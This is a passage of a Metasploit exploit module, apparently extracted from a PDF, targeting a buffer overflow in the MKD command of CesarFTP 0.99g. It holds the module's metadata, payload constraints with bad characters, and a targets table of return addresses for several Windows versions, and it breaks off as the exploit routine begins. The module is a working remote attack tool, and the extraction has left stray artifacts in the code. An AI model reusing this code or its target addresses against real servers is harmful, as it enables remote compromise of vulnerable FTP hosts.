1 ##
2 #−−−ORIGINAL CREDITS TO h07 FOR FINDING THIS VULN−−−
3 # Ported to metasploit by c0rrupt
4 # ~ f34r.us ~
5 ##
6
7 package Msf::Exploit::cesarftp_mkd;
8 use base "Msf::Exploit";
9 use strict;
10 use Pex::Text;
11
12 my $advanced = { };
13
14 my $info =
15 {
16
’Name’ => ’CesarFTP 0.99g Buffer Overflow’,
17
’Version’ => ’$Revision: 1.3 __DOCTEXT__rsquo;,
18
’Authors’ => [ ’c0rrupt [at] f34r [dot] us’, ],
19
20
’Arch’ => [ ’x86’ ],
21
’OS’ => [ ’win32’, ’win2000’, ’winxp’ ],
22
’Priv’ => 0,
23
24
’AutoOpts’ => { ’EXITFUNC’ => ’seh’ },
25
’UserOpts’ =>
26
{
27
’RHOST’ => [1, ’ADDR’, ’The target address’],
28
’RPORT’ => [1, ’PORT’, ’The target port’, 21],
29
’USER’ => [1, ’USER’, ’Login name’],
30
’PASS’ => [1, ’PASS’, ’Password’],
31
},
32
33
’Payload’ =>
34
{
35
’Space’ => 325,
36
’BadChars’ => "\x00\x09\x0a\x0d\x22\x25\x26\x27\x2f\x3a\x3e\x3f\xFF\x5c",
37
},
38
39
’Description’ => Pex::Text::Freeform(qq{
40
This module exploits the buffer overflow found in the MKD command
41
in CesarFTP 0.99g. It is required that the user be properly logged in
42
before the exploit can be peformed.
43 }),
44
45
’Refs’ =>
46
[
47
[’URL’, ’http://www.milw0rm.com/exploits/1906’]
48
],
49
50
’DefaultTarget’ => 0,
51
’Targets’ =>
52
[
Page 1/3
CesarFTP 0.99g MKD Remote Buffer Overflow Exploit meta
c0rrupt
06/15/2006
53
[’Windows XP SP2 English’, 0x7746F114 ],
# comctl32
54
[’Windows XP SP0/SP1 English’, 0x776606af ],
55
[’Windows 2003 server sp0/xp sp1 English’, 0x77798428 ],
56
[’Windows 2003 server SP1 English’, 0x7caa9618 ],
57
[’Windows 2000 SP4 English’, 0x78344dd3 ],
58
],
59
60
’Keys’ => [’ceasarftp’],
61
62
’DisclosureDate’ => ’June 12 2006’,
63 };
64
65 sub new {
66
my $class = shift;
67
my $self = $class−>SUPER::new({’Info’ => $info, ’Advanced’ => $advanced}, @_);
68
return($self);
69 }
70
71 sub Exploit {
72
my $self = shift;
73
my $target_host = $self−>GetVar(’RHOST’);
74
my $target_port = $self−>GetVar(’RPORT’);
75
my $target_idx = $self−>GetVar(’TARGET’);
76
my $shellcode